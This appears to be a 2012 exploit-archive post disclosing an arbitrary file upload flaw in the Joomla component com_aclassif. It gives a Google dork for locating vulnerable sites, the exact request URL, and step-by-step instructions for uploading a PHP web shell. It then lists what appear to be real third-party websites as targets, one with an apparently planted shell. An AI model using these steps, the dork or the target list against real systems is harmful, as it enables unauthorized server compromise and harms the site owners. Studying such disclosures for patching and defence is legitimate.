facebook facebook twitter rss

Joomla Component com_aclassif shell upload Vulnerability

Author: Zikou-16 , Published: 24-12-2012
-----------------------------------------------------------
Joomla Component com_aclassif shell upload Vulnerability
-----------------------------------------------------------

#####
# Author => Zikou-16
#
# Facebook => http://fb.me/Zikou.se
#
# Google Dork => inurl:"index.php?option=com_aclassif"
#
# Tested on : Windows 7 , Backtrack 5r3
####

#=> Exploit Info :
------------------
# The attacker can upload any file/shell .php
------------------

#=> Exploit :
------------------

http://localhost/index.php?option=com_aclassif&option=com_aclassif&ct=wlkm_repl&md=add_form&replid=917&fblg=1

Put all the information & Submit attachment file => upload shell.php

Then Submit Ad

You will see your shell path => Attachment file: (.php, 96Kb)

#=> Demo Shell: http://ardwatalab.net/ara/components/com_aclassif/photos/mtmd4332.php

------------------------------

#=> Demos :

http://www.almondsoft.com/jm/index.php?option=com_aclassif&option=com_aclassif&ct=wlkm_repl&md=add_form&replid=917&fblg=1

http://ardwatalab.net/ara/index.php/ar/index.php?option=com_aclassif&option=com_aclassif&ct=wlkm_repl&md=add_form&replid=917&fblg=1

http://www.bonanza.org//index.php?option=com_aclassif&option=com_aclassif&ct=wlkm_repl&md=add_form&replid=917&fblg=1

------------------------------

Like us on Facebook :